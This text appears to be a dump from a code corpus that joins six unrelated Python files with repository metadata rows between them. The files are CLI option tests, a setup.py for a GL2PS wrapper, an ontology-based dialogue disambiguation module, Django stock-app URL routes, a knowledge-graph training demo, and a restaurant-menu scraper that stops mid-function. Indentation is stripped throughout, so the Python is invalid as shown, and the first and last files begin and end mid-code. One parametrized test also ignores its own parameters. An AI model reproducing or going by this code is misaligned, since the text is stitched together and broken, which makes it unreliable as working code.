expected = 'duration option got invalid value {!r}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_bad_users():
"""Value < 0 for users option raises error"""
config = {}
args = ['-u', '0', 'what']
expected = 'users option expected value > 0, got 0'
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
@pytest.mark.parametrize('val', [0, 1])
def test_main_periods_badvalue(val):
"""Raise error if periods is given value <= 1"""
config = {}
args = ['-p', str(val), '-d', '1s', 'what']
expected = 'periods option must be > 1'
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_export_baddir(monkeypatch):
"""Raise error if directory does not exist"""
def fake_isdir(n):
"""fake_isdir"""
return False
monkeypatch.setattr(cli, 'isdir', fake_isdir)
config = {}
args = ['-E', 'csv', '-e', '/not/exist', '-d', '1s', 'what']
expected = '/not/exist'
with pytest.raises(FileNotFoundError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_export_targetdir(monkeypatch):
"""Store export directory in internal config"""
def fake_isdir(n):
"""fake_isdir"""
return True
monkeypatch.setattr(cli, 'isdir', fake_isdir)
config = {}
args = ['-E', 'csv', '-e', '/not/exist', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'export' in llconfig
exportconfig = llconfig['export']
assert exportconfig['type'] == 'csv'
assert exportconfig['targetdir'] == '/not/exist'
def test_main_export_nodir(monkeypatch):
"""Use current directory if targetdir not given"""
config = {}
args = ['-E', 'csv', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'export' in llconfig
exportconfig = llconfig['export']
assert exportconfig['type'] == 'csv'
assert exportconfig['targetdir'] == os.getcwd()
def test_main_logfile_default():
"""Default logfile"""
config = {}
args = ['-L', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'logging' in llconfig
expected = Path.cwd() / '{}.log'.format(cli.PROGNAME)
assert llconfig['logging']['logfile'] == str(expected)
def test_main_logfile_bad_parentdir(monkeypatch):
"""Raise error if given logfile path's parent doesn't exist"""
filename = Path('/imaginary/path/notexist')
def fake_isdir(self):
"""fake_isdir"""
return False
monkeypatch.setattr(cli.Path, 'is_dir', fake_isdir)
config = {}
args = ['-L', '-l', str(filename), '-d', '1s', 'what']
with pytest.raises(FileNotFoundError) as err:
main(arglist=args, config=config)
assert err.value.args == (str(filename.parent), )
def test_main_logfile_isdir(monkeypatch):
"""Raise error if given logfile is a directory"""
filename = Path('/imaginary/path/notexist')
def fake_isdir(self):
"""fake_isdir"""
return True
monkeypatch.setattr(cli.Path, 'is_dir', fake_isdir)
config = {}
args = ['-L', '-l', str(filename), '-d', '1s', 'what']
with pytest.raises(IsADirectoryError) as err:
main(arglist=args, config=config)
assert err.value.args == (str(filename), )
@pytest.mark.parametrize('val', ['hello', (42, )])
def test_main_flushwait_badval(val):
"""Raise error if flushwait is given bad value"""
config = {}
args = ['--flush-wait', str(val), '-d', '1s', 'what']
expected = 'duration option got invalid value: {}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_schedsize_badval():
"""Raise error if sched-size is given value larger than numusers"""
numusers = 10
schedsize = 42
config = {}
args = ['-u', str(numusers), '--sched-size', str(schedsize), '-d', '1s',
'what']
msg = 'sched-size option expected maximum value of {}, got value {}'
expected = msg.format(numusers, schedsize)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
@pytest.mark.parametrize('val,numusers', [
(v, u) for v in [0, 5, 10]
for u in [0, 5, 10]
])
def test_main_schedsize_goodval(val, numusers):
"""Don't raise eror if sched-size is >= 0 and <= numusers"""
numusers = 10
schedsize = 10
config = {}
args = ['-u', str(numusers), '--sched-size', str(schedsize), '-d', '1s',
'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
@pytest.mark.parametrize('val', ['hello', (42, )])
def test_main_sched_delay_badval(val):
"""Raise error if sched_delay is given bad value"""
config = {}
args = ['--sched-delay', str(val), '-d', '1s', 'what']
expected = 'sched-delay option got invalid value: {}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
# ============================================================================
#
# ============================================================================
| mit | 2,256,627,370,758,611,500 | 27.075843 | 78 | 0.587394 | false | 3.761761 | true | false | false |
dladd/pyFormex | pyformex/extra/pygl2ps/setup.py | 1 | 1773 | # $Id$
##
## This file is part of pyFormex 0.8.9 (Fri Nov 9 10:49:51 CET 2012)
## pyFormex is a tool for generating, manipulating and transforming 3D
## geometrical models by sequences of mathematical operations.
## Home page: http://pyformex.org
## Project page: http://savannah.nongnu.org/projects/pyformex/
## Copyright 2004-2012 (C) Benedict Verhegghe ([email protected])
## Distributed under the GNU General Public License version 3 or later.
##
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see http://www.gnu.org/licenses/.
##
from distutils.core import setup, Extension
setup(name="pygl2ps",
version="1.3.3",
description="Wrapper for GL2PS, an OpenGL to PostScript Printing Library",
author="Benedict Verhegghe",
author_email="[email protected]",
url="http://pyformex.org",
long_description="""
Python wrapper for GL2PS library by Christophe Geuzaine.
See http://www.geuz.org/gl2ps/
""",
license="GNU LGPL (Library General Public License)",
py_modules=["gl2ps"],
ext_modules=[Extension("_gl2ps",
["gl2ps.c","gl2ps_wrap.c"],
libraries=["GL"])])
| gpl-3.0 | 2,702,310,009,199,735,000 | 42.243902 | 80 | 0.689227 | false | 3.490157 | false | false | false |
severin-lemaignan/dialogs | src/dialogs/interpretation/discrimination.py | 1 | 16975 | # -*- coding: utf-8 -*-
"""This module implements the clarification process for ambiguous descriptions.
Given a description of an object (ambigouos or not) it returns, if found, the
object's identifier in oro. If necessary, it will query the human for additional
information.
"""
import logging
logger = logging.getLogger("dialogs")
from kb import KbError
from dialogs.resources_manager import ResourcePool
from dialogs.dialog_exceptions import UnsufficientInputError
from dialogs.sentence import *
from dialogs.sentence_factory import SentenceFactory
from dialogs.helpers.helpers import generate_id
from random import choice
class Discrimination(object):
def __init__(self):
self.oro = ResourcePool().ontology_server
# -- GET_ALL_OBJECTS_WITH_DESC ------------------------------------------------#
# Returns all objects' ids with a given set of features (eg. green, big, etc).
# Since we have several descriptions, we obtain a list of objects for each agent
# and then we intersect them.
#
# INPUT:
# - description:
# [[agent1 '?obj' oro_query]..[[agentN '?obj' oro_query]]
# (oro_query= ['?obj hasColor blue',.. ?obj hasShape box'])
#
# OUTPUT:
# - empty list: no objects found fulfilling the description
# - list: objects fulfilling the description
# - None: no description (or description format incorrect)
# -----------------------------------------------------------------------------#
def get_all_objects_with_desc(self, description):
obj_list = None
for agent_desc in description:
obj_tmp = []
try:
obj_tmp = self.oro.findForAgent(ResourcePool().get_model_mapping(agent_desc[0]), agent_desc[1], agent_desc[2])
except KbError: #The agent does not exist in the ontology
pass
# if no object found, no need to continue
if not obj_tmp:
obj_list = []
break
else:
if obj_list is None:
obj_list = obj_tmp
else:
obj_list = [x for x in obj_tmp if x in obj_list] # intersection
return obj_list
# -- GET_DISCRIMINANT ---------------------------------------------------------#
# Queries the ontology for a list of discriminants. Returns the first one.
# TODO: prioritize which discriminant to return.
#
# INPUT:
# - agent
# - object list
# - ignore_descriptors: list of descriptors not to be used
# - include_partial: if true, then partial discriminants are also returned
# OUTPUT:
# - discriminant: [C, discriminat] if complete, or [P, discriminant] if partial
# The new discriminant should be different from the ones already known or ignored
# -----------------------------------------------------------------------------#
def get_discriminant(self, agent, obj_list, ignore_descriptors, include_partial):
discriminants = self.oro.discriminateForAgent(ResourcePool().get_model_mapping(agent), obj_list)
logger.debug(colored_print('Possible discriminants: ', 'magenta') + \
str(colored_print(discriminants[1], 'blue')) + \
colored_print(" (complete discriminants: ", 'magenta') + \
str(colored_print(discriminants[0], 'blue')) + ")")
complete_disc = discriminants[0]
partial_disc = discriminants[1]
if complete_disc:
res = [x for x in complete_disc if x not in ignore_descriptors]
elif partial_disc and include_partial:
res = [x for x in partial_disc if x not in ignore_descriptors]
else:
res = None
if res:
# include randomization so the same discriminant is not always returned
return choice(res)
else:
# No discriminant after applying the blacklist.
return None
# -- GET_DESCRIPTOR -----------------------------------------------------------#
# Searches for a new descriptor candidate from all agents.
#
# INPUT:
# - description:
# [[agent1 '?obj' oro_query]..[[agentN '?obj' oro_query]]
# (oro_query= ['?obj hasColor blue',.. ?obj hasShape box'])
# - ignore_features: list of features not to use as discriminants
# [feat1 ..featN]
# - allowPartialDesc: consider also partial discriminants (1) or not (0) (0 default)
#
# OUTPUT:
# - descriptor or None (if no discriminant for any agent found)
# -----------------------------------------------------------------------------#
def get_descriptor(self, description, ignore_features=None, partial_disc=True):
if not ignore_features: ignore_features = []
objL = self.get_all_objects_with_desc(description)
descriptor = None
agent = None
#TODO bug in oro doesn't allow to search discriminants base on other agents models!!
# we cannot search in all agents, but only in robot's model
# for agent_desc in description:
# # list current descriptors to not to use them anymore
# #currentDescriptors = map(lambda x: x.split()[1], agent_desc[2])
# descriptor = self.get_discriminant(agent_desc[0], objL, ignore_features, partial_disc)
#
# if descriptor:
# agent = agent_desc[0]
# break
agent = ResourcePool().default_model
# list current descriptors to not to use them anymore
#currentDescriptors = map(lambda x: x.split()[1], description[0][2])
descriptor = self.get_discriminant(agent, objL, ignore_features, partial_disc)
return agent, descriptor
# -- get_values_for_descriptor ------------------------------------------------#
# Creates the information to be sent to user based on the discriminant found.
#
# INPUT:
# - agent, discriminant, objectsList
#
# OUTPUT
# - list of values to ask for
# -----------------------------------------------------------------------------#
def get_values_for_descriptor(self, agent, descriptor, objL):
valL = []
# get values for each object
for obj in objL:
# if the discriminant is type, then look for the directClass of the obj (first found)
# how should this work for different agents? There is no directClassForAgent
# probably won't be necessary since all the knowledge of the human is part
# of the robot's knowledge as well. Then we can obtain this information
# directly from the robot itself.
if descriptor == 'rdf:type':
val = list(self.oro.getDirectClassesOf(obj).keys())
else:
val = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), '?val', [obj + ' ' + descriptor + ' ?val'])
if val:
#TODO: we only consider the first result item!
valL.append(self.oro.getLabel(val[0]))
# otherwise, the object doesn't have this descriptor, and we don't include it
# we make a set to remove repeated elements
return list(set(valL))
# -- get_type_description ------------------------------------------------------#
# Returns the first type of concept in the description.
#
# INPUT:
# - description
#
# OUTPUT:
# - type
# - none
# -------------------------------------------------------------------------------#
def get_type_description(self, description):
def find(value, seq):
for item in seq:
items = item.split()
if value in items:
return items[2]
return None
type = None
for desc in description:
type = find('rdf:type', desc[2])
if type: break
return ResourcePool().ontology_server.getLabel(type)
# -- CLARIFY ------------------------------------------------------------------#
# Searches for a new descriptor candidate. The descriptor should be as
# discriminating as possible.
#
# INPUT:
# - description [['myself', '?obj', ['?obj rdf:type Bottle', '?obj hasColor blue']],
# ['agent1', '?obj', ['?obj isVisible True']]
# - ignoreFeatureL [feat1..featN] List of features not to use as discriminators.
#
# OUTPUT:
# - objectID: ok
# - UnsufficientInputError:
# - [FAILURE, "new info required"]: no match, new info required (forget previous description)
# - [SUCCESS, "Which value? ..."]: user should indicate value for descriptor (mantain previous description)
# - [SUCCESS, "additional info required"]: user should give additional info (mantain previous description)
# -----------------------------------------------------------------------------#
def clarify(self, description, ignoreFeatureL=None):
if not ignoreFeatureL: ignoreFeatureL = []
objL = self.get_all_objects_with_desc(description)
if len(objL) == 0:
logger.debug(colored_print('Nothing found!', "magenta"))
else:
logger.debug(
colored_print('Found these possible concepts ID: ', "magenta") + colored_print(str(objL), 'blue'))
if not self.oro: #No ontology server
return 'UNKNOWN_CONCEPT_' + generate_id(with_question_mark=False)
if not objL:
questions = SentenceFactory().create_i_dont_understand()
raise UnsufficientInputError({'status': 'FAILURE', 'question': questions})
#return "I don't understand"
else:
# Check if the speaker sees only some of the object.
# If he sees none of them, discriminate on the whole set.
# Else, discriminate only on visible objects.
agent = description[0][0]
logger.debug("Checking which of these objects are visible for " + agent)
visible_objects = self.visible_subset(agent, objL)
if visible_objects:
objL = visible_objects
logger.debug(colored_print('Only ', "magenta") +
colored_print(str(objL), 'blue') +
colored_print(" are visible by " + agent, "magenta"))
else:
logger.debug(colored_print('None are visible by ' + agent, "magenta"))
if len(objL) == 1:
return objL[0]
if len(objL) == 2 and self.oro.check(['%s owl:sameAs %s' % (objL[0], objL[1])]):
return objL[0]
agent, descriptor = self.get_descriptor(description, ignoreFeatureL)
object = self.get_type_description(description)
if descriptor:
sentence_builder = SentenceFactory()
question = None
values = self.get_values_for_descriptor(agent, descriptor, objL)
if not object: object = 'object'
if descriptor == 'hasColor' or descriptor == 'mainColorOfObject':
questions = sentence_builder.create_w_question_choice(object, 'color', values)
elif descriptor == 'hasShape':
questions = sentence_builder.create_w_question_choice(object, 'shape', values)
elif descriptor == 'hasSize':
questions = sentence_builder.create_w_question_choice(object, 'size', values)
elif descriptor == 'isOn':
questions = sentence_builder.create_w_question_location(object, 'on', values)
elif descriptor == 'isIn':
questions = sentence_builder.create_w_question_location(object, 'in', values)
elif descriptor == 'isNextTo':
questions = sentence_builder.create_w_question_location(object, 'next to', values)
elif descriptor == 'isAt':
questions = sentence_builder.create_w_question_location(object, 'at', values)
elif descriptor == 'isLocated':
questions = sentence_builder.create_w_question_location_PT(values, agent)
elif descriptor == 'rdf:type':
questions = sentence_builder.create_w_question_choice(object, 'type', values)
else:
questions = sentence_builder.create_w_question_generic_descriptor(object, descriptor, values)
raise UnsufficientInputError({'status': 'SUCCESS', 'question': questions})
#return questions
else:
questions = [Sentence(IMPERATIVE, '', [],
[VerbalGroup(['give'], [], 'present simple',
[NominalGroup([], ['information'], [['more', []]], [], [])],
[IndirectComplement([], [NominalGroup([], ['me'], [], [], [])]),
IndirectComplement(['about'], [
NominalGroup(['the'], [object], [], [], [])])],
[], [], VerbalGroup.affirmative, [])])]
raise UnsufficientInputError({'status': 'SUCCESS', 'question': questions})
#return "Give me more information about the object"
def visible_subset(self, agent, id_list):
""" Returns the list of visible objects for an agent from a list of objects.
"""
visible_objects = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), "?o", [agent + " sees ?o"])
return list(set(id_list) & set(visible_objects))
# -- ADD_DESCRIPTOR -----------------------------------------------------------#
# Includes descriptor in description list.
#
# INPUT:
# - agent: to which agent the descriptor belongs to
# - description: current description
# - descriptor: feature
# - value: feature value
#
# OUTPUT:
# - new description
# -----------------------------------------------------------------------------#
def add_descriptor(self, agent, description, descriptor, value):
# return sublist index in seq containing value
def find(value, seq):
for index, item in enumerate(seq):
if value in item:
return index, item
idx, desc = find(agent, description)
desc[2].append('?obj ' + descriptor + ' ' + value)
description[idx] = desc
return description
# -- FIND_UNAMBIGUOUS_DESC ---------------------------------------#
# Searches an unambiguous description for a given object.
# If it fails, it returns the most complete description found.
#
# INPUT:
# - objectID: object to be described
#
# OUTPUT:
# - a tuple (is_unambigous, description)
# - is_unambigous is a boolean
# - description is a set of partial statements like
# "?obj rdf:type Superman" describing as well as possible
# the object.
# ----------------------------------------------------------------#
def find_unambiguous_desc(self, objectID):
description = None
# get the first class name
types = [t for t in list(self.oro.getDirectClassesOf(objectID).keys()) if t not in ["ActiveConcept"]]
# Not type asserted/inferred? then assume this object is unique.
if not types:
return True, []
type = types[0]
myself = ResourcePool().default_model
description = [[myself, '?obj', ['?obj rdf:type ' + type]]]
objL = self.get_all_objects_with_desc(description)
while len(objL) > 1:
nbCandidates = len(objL)
logger.debug('Description ' + objectID + ': ' + str(description))
logger.debug('ObjL: ' + str(objL))
agent, descriptor = self.get_descriptor(description, [], True)
if not descriptor:
break
val = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), '?val', [objectID + ' ' + descriptor + ' ?val'])
if not val:
break
description = self.add_descriptor(agent, description, descriptor, val[0])
objL = self.get_all_objects_with_desc(description)
if nbCandidates == len(objL):
logger.error("While trying to find an unambiguous description" + \
" of " + objectID + ", oro answered a non-discriminant" + \
" property. Bug in oro? Halting here for now.")
break
if len(objL) == 1:
unambiguous = True
else:
unambiguous = False
return unambiguous, description[0][2]
| bsd-3-clause | 7,504,683,858,154,541,000 | 40.503667 | 129 | 0.540677 | false | 4.481257 | false | false | false |
denever/discipline_terra | stock/urls.py | 1 | 3873 | from django.conf.urls import patterns, include, url
from django.contrib.auth.decorators import login_required, permission_required
from stock.views import ProductListView, WarningProductListView, DangerProductListView, SearchProductListView
from stock.views import ProductByCategoryListView
from stock.views import ProductDetailView
from stock.views import ProductCreateView
from stock.views import ProductUpdateView
from stock.views import ProductDeleteView
from stock.views import PackageListView
from stock.views import PackageDetailView
from stock.views import PackageCreateView
from stock.views import PackageUpdateView
from stock.views import PackageDeleteView
from stock.views import CategoryCreateView
from stock.views import CategoryDeleteView
urlpatterns = patterns('stock.views',
url(r'^$', login_required(ProductListView.as_view()),
name='stock'),
url(r'^products/$', login_required(ProductListView.as_view()),
name='products'),
url(r'^products/search$', login_required(SearchProductListView.as_view()),
name='products-search'),
url(r'^products/category/(?P<pk>\d+)$',
login_required(ProductByCategoryListView.as_view()),
name='products-category'),
url(r'^products/warning$', login_required(WarningProductListView.as_view()),
name='products-warning'),
url(r'^products/danger$', login_required(DangerProductListView.as_view()),
name='products-danger'),
url(r'^product/(?P<pk>\d+)$',
login_required(ProductDetailView.as_view()),
name = 'product-detail'),
url(r'^product_create/$',
login_required(ProductCreateView.as_view()),
name = 'product-create'
),
url(r'^product_update/(?P<pk>\d+)$',
login_required(ProductUpdateView.as_view()),
name = 'product-edit'
),
url(r'^product_delete/(?P<pk>\d+)$',
login_required(ProductDeleteView.as_view()),
name = 'product-delete'
),
url(r'^packages/$', login_required(PackageListView.as_view()),
name='packages'),
url(r'^package/(?P<pk>\d+)$',
login_required(PackageDetailView.as_view()),
name = 'package-detail'),
url(r'^package_create/$',
login_required(PackageCreateView.as_view()),
name = 'package-create'
),
url(r'^package_update/(?P<pk>\d+)$',
login_required(PackageUpdateView.as_view()),
name = 'package-edit'
),
url(r'^package_delete/(?P<pk>\d+)$',
login_required(PackageDeleteView.as_view()),
name = 'package-delete'
),
url(r'^category_create/$',
login_required(CategoryCreateView.as_view()),
name = 'category-create'
),
url(r'^category_delete/(?P<pk>\d+)$',
login_required(CategoryDeleteView.as_view()),
name = 'category-delete'
),
)
| gpl-2.0 | -1,153,447,836,820,365,800 | 42.033333 | 109 | 0.487994 | false | 5.240866 | false | true | false |
jpmpentwater/traversing_knowledge_graphs | code/demo.py | 1 | 5856 | from optimize import *
from diagnostics import *
import configs
import argparse
from data import *
import copy
# parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('config')
parser.add_argument('dataset_path')
parser.add_argument('-i', '--initial_params', default=None)
parser.add_argument('-glove', '--glove_vectors', default=None)
args = parser.parse_args()
# load pre-set configuration from configs module
config = getattr(configs, args.config)
config['dataset_path'] = args.dataset_path
config['params_path'] = args.initial_params
config['glove_path'] = args.glove_vectors
# load all configs into local namespace
for var, val in config.iteritems():
exec("{0} = config['{0}']".format(var))
util.metadata(var, val) # this logs parameters to a metadata file.
def print_header(msg):
print
print msg.upper()
print '=====' * 5
print
# define training procedure
def build_trainer(train, test, max_steps, step_size, init_params=None):
# negative triple generator for training
triples = [(q.s, str(q.r[0]), q.t) for q in train if len(q.r) == 1]
train_graph = Graph(triples)
train_neg_gen = NegativeGenerator(train_graph, max_negative_samples_train,
positive_branch_factor, type_matching_negs
)
# specify the objective to maximize
objective = CompositionalModel(train_neg_gen, path_model=path_model,
objective='margin')
# initialize params if not already initialized
if init_params is None:
init_params = objective.init_params(
dset.entity_list, dset.relations_list, wvec_dim, model=path_model,
hidden_dim=hidden_dim, init_scale=init_scale, glove_path=glove_path)
save_wait = 1000 # save parameters after this many steps
eval_samples = 200 # number of examples to compute objective on
# define Observers
observers = [NormObserver(report_wait), SpeedObserver(report_wait),
ObjectiveObserver(eval_samples, report_wait)]
# this Observer computes the mean rank on each split
rank_observer = RankObserver({'train': train, 'test': test},
dset.full_graph, eval_samples,
max_negative_samples_eval, report_wait,
type_matching_negs=True)
observers.append(rank_observer)
# define Controllers
controllers = [BasicController(report_wait, save_wait, max_steps),
DeltaClipper(), AdaGrad(), UnitNorm()]
trainer = OnlineMaximizer(
train, test, objective, l2_reg=l2_reg, approx_reg=True,
batch_size=batch_size, step_size=step_size, init_params=init_params,
controllers=controllers, observers=observers)
return trainer
dset = parse_dataset(dataset_path, dev_mode=False, maximum_examples=100)
warm_start = params_path is not None
if warm_start:
print 'loading warm start params...'
init_params = load_params(params_path, path_model)
else:
init_params = None
print_header('single-edge training')
# train the model on single edges
one_hop_only = lambda queries: [q for q in queries if len(q.r) == 1]
trainer0 = build_trainer(
one_hop_only(dset.train), one_hop_only(dset.test),
max_steps_single, step_size_single, init_params
)
params0 = trainer0.maximize()
params_single = copy.deepcopy(params0)
print_header('path training')
# train the model on all edges, with warm start from single-edge model
trainer = build_trainer(dset.train, dset.test, max_steps_path,
step_size_path, params0)
params_comp = trainer.maximize()
print_header('evaluation')
def report(queries, model, neg_gen, params):
scores = lambda query: model.predict(params, query).ravel()
def compute_quantile(query):
s, r, t = query.s, query.r, query.t
negatives = neg_gen(query, 't')
pos_query = PathQuery(s, r, t)
neg_query = PathQuery(s, r, negatives)
# don't score queries with no negatives
if len(negatives) == 0:
query.quantile = np.nan
else:
query.quantile = util.average_quantile(scores(pos_query), scores(neg_query))
query.num_candidates = len(negatives) + 1
for query in util.verboserate(queries):
compute_quantile(query)
# filter out NaNs
queries = [q for q in queries if not np.isnan(q.quantile)]
mean_quantile = np.mean([q.quantile for q in queries])
hits_at_10 = np.mean([1.0 if util.rank_from_quantile(q.quantile, q.num_candidates) <= 10 else 0.0 for q in queries])
print 'mean_quantile:', mean_quantile
print 'h10', hits_at_10
return mean_quantile, hits_at_10
# used for all evaluations
neg_gen = NegativeGenerator(dset.full_graph, float('inf'), type_matching_negs=True)
print_header('path query evaluation')
print '--Single-edge trained model--'
mq, h10 = report(dset.test, trainer0.objective, neg_gen, params_single)
util.metadata(('path_queries', 'SINGLE', 'mq'), mq)
util.metadata(('path_queries', 'SINGLE', 'h10'), h10)
print
print '--Compositional trained model--'
mq, h10 = report(dset.test, trainer.objective, neg_gen, params_comp)
util.metadata(('path_queries', 'COMP', 'mq'), mq)
util.metadata(('path_queries', 'COMP', 'h10'), h10)
print
print_header('single edge evaluation')
print '--Single-edge trained model--'
mq, h10 = report(one_hop_only(dset.test), trainer0.objective, neg_gen, params_single)
util.metadata(('single_edges', 'SINGLE', 'mq'), mq)
util.metadata(('single_edges', 'SINGLE', 'h10'), h10)
print
print '--Compositional trained model--'
mq, h10 = report(one_hop_only(dset.test), trainer.objective, neg_gen, params_comp)
util.metadata(('single_edges', 'COMP', 'mq'), mq)
util.metadata(('single_edges', 'COMP', 'h10'), h10)
| mit | 2,815,330,726,600,916,500 | 33.650888 | 120 | 0.664788 | false | 3.477435 | true | false | false |
lesleymaraina/DataScience.Restaurants | ingest/ingest.py | 1 | 9239 |
"""
An ingest module
"""
from lxml import html
import requests
import json
from bs4 import BeautifulSoup
import re
#Python 3
import urllib.request
# #Python 2
# import urllib
import pymongo
import os
import pickle
class IngestSystem(object):
def __init__(self, cl):
self.cities = cl
def pull_and_load(self):
'''
l = self.get_city_urls()
r = []
for city in l:
print(city)
one_city = self.get_restaurant_urls(city)
print(one_city)
# Get the 100 most popular restaurants for each city
#for w in one_city[:100]:
for w in one_city: ## Additional DC restaurants ONLY to pull all restaurants
if ('menu' in w[0]) and ('kids' not in w[0]):
r.append(w)
pickle.dump(r,open('restaurant_url_list.txt','wb'))
r=pickle.load(open('restaurant_url_list.txt', 'rb'))
print(len(r))
self.store_raw(r[200:300])
'''
self.build_database()
def get_city_urls(self):
url_list = []
for i in self.cities:
url_list.append(('http://www.allmenus.com/'+i['state']+'/'+i['city']+'/-/?sort=popular', i['city'], i['state']))
return url_list
def get_restaurant_urls(self, url_citystate_tuple):
uct = url_citystate_tuple
a = HTMLReader(uct[0])
citysoup = a.html_to_soup()
urllist = a.soup_to_urllist(citysoup, uct[1], uct[2])
return urllist
def store_raw(self, rest_list):
for r in rest_list:
splt = r[0].split('/')
a = HTMLReader('http://www.allmenus.com'+r[0])
restsoup = a.html_to_soup()
with open("raw_data/"+splt[1]+"_"+splt[2]+"_"+splt[3]+".html", "w") as f:
print("Writing "+splt[1]+"_"+splt[2]+"_"+splt[3]+".html")
f.write(restsoup.prettify())
def build_database(self):
l = []
for filenm in os.listdir('raw_data/'):
if filenm != '.DS_Store':
tmp = Restaurant(filenm).db_obj()
if (len(tmp['menu']) >= 1) and (tmp['latitude'] != 9999) and (tmp['type'] != ""):
l.append(tmp)
print(len(l))
'''
conn = pymongo.MongoClient()
db = conn.rdata
for i in l:
print("Insert "+i['name'])
db.restaurants.insert_one(i)
'''
self.final_rlist = l
class HTMLReader(object):
def __init__(self, uct):
self.url = uct
def html_to_soup(self):
html = urllib.request.urlopen(self.url).read()
soup = BeautifulSoup(html, "lxml")
return soup
def soup_to_urllist(self, soup, cityname, statename):
tmp = []
match = '/'+statename
for u in soup.findAll("a", href=True):
if (u['href'])[:3] == match:
tmp.append((u['href'], cityname, statename))
return tmp
def build_info(self):
pass
def build_menu(self):
pass
class Restaurant(object):
def __init__(self, filenm):
soup = BeautifulSoup(open('raw_data/'+filenm, 'r'), "lxml")
self.name = soup.find("h1", {"itemprop": "name"}).string.strip()
self.street = soup.find("span", {"itemprop": "streetAddress"}).string.strip()
self.city = soup.find("span", {"itemprop": "addressLocality"}).string.strip()
self.state = soup.find("span", {"itemprop": "addressRegion"}).string.strip()
self.zip = soup.find("span", {"itemprop": "postalCode"}).string.strip()
self.lat = str(soup.find("meta", {"itemprop": "latitude"}))
self.lng = str(soup.find("meta", {"itemprop": "longitude"}))
self.ratings = soup.findAll(attrs = {"itemprop": "ratingValue"})
self.msoup = soup.findAll("li")
def db_obj(self):
r={}
l=[]
r['name'] = self.name
r['street'] = self.street
r['city'] = self.city
r['state'] = self.state
r['zip'] = self.zip
# Add geolocation information
try:
r['latitude'] = float(re.findall(r'"(.*?)"', self.lat)[0])
r['longitude'] = float(re.findall(r'"(.*?)"', self.lng)[0])
except ValueError:
r['latitude'] = float(9999.000)
r['longitude'] = float(9999.000)
#Create a city group for suburb city names
a = self.city
if a in ['Dunwoody', 'East Point', 'Sandy Springs']:
r['city_group'] = 'Atlanta'
elif a in ['Alsip', 'Cicero', 'Evergreen Park', 'Harwood Heights', 'Elmwood Park']:
r['city_group'] = 'Chicago'
elif a in ['Hollywood', 'West Hollywood']:
r['city_group'] = 'Los Angeles'
elif a in ['Greenfield', 'Wauwatosa', 'West Allis']:
r['city_group'] = 'Milwaukee'
elif a in ['South Austin']:
r['city_group'] = 'Austin'
else:
r['city_group'] = a
# Take an average of ratings, or else assign a 2.0
if len(self.ratings) == 0:
r['avg_rating'] = 0.0
else:
num=0
count=0
for i in self.ratings:
num=num+float(i['content'])
count=count+1
r['avg_rating'] = num/float(count)
# Add a blank to cuisine type is missing data
if self.msoup[0].string:
r['type'] = self.msoup[0].string.strip()
else:
r['type'] = ""
# Create a second consolidated cusine type
if self.msoup[0].string:
a = self.msoup[0].string.strip()
if a in ['Ethiopian']:
r['type_2'] = 'African'
elif a in ['Hawaiian', 'Local/Organic', 'American (New)']:
r['type_2'] = 'American'
elif a in ['Breakfast', 'Bakery & Pastries', 'Coffee & Tea']:
r['type_2'] = 'Bakery, Breakfast & Coffee'
elif a in ['Gastropub', 'Pub Food']:
r['type_2'] = 'Bar Food'
elif a in ['Hot Dogs', 'Burgers']:
r['type_2'] = 'Burgers & Hot Dogs'
elif a in ['Dominican', 'Jamaican']:
r['type_2'] = 'Caribbean'
elif a in ['Asian Fusion', 'Taiwanese']:
r['type_2'] = 'Chinese'
elif a in ['Sandwiches', 'Deli Food']:
r['type_2'] = 'Deli & Sandwiches'
elif a in ['Ice Cream', 'Crepes']:
r['type_2'] = 'Desserts'
elif a in ['Austrian', 'British', 'Eastern European', 'Eclectic & International', 'Spanish', 'French', 'Belgian', 'Irish', 'German', 'Polish']:
r['type_2'] = 'European'
elif a in ['Puerto Rican', 'Brazilian', 'Central American']:
r['type_2'] = 'Latin American'
elif a in ['Greek']:
r['type_2'] = 'Mediterranean'
elif a in ['Sushi', 'Seafood']:
r['type_2'] = 'Seafood & Sushi'
elif a in ['Soul Food', 'Cajun & Creole']:
r['type_2'] = 'Southern'
elif a in ['Tex-Mex']:
r['type_2'] = 'Southwestern'
elif a in ['Chicago Grill']:
r['type_2'] = 'Steak'
elif a in ['Burmese', 'Malaysian']:
r['type_2'] = 'Thai'
elif a in ['Noodles']:
r['type_2'] = 'Vietnamese'
elif a in ['Pakistani']:
r['type_2'] = 'Middle Eastern'
elif a in ['Salads']:
r['type_2'] = 'Vegetarian'
else:
r['type_2'] = a
else:
r['type_2'] = ""
# Create menu, add blanks if either price or description fields are missing
for i in self.msoup:
m={}
if i.find("span","name") or i.find("span","price") or i.find("p", "description"):
if i.find("span","name"):
m["item"] = i.find("span","name").string.strip()
else:
m["item"] = ""
# For prices, set $0.00 to blanks and take the first price in a range of prices
if i.find("span","price"):
tmppr = i.find("span","price").string.strip()
tmppr = re.sub('[$]', '', tmppr)
print(tmppr)
if '-' not in tmppr:
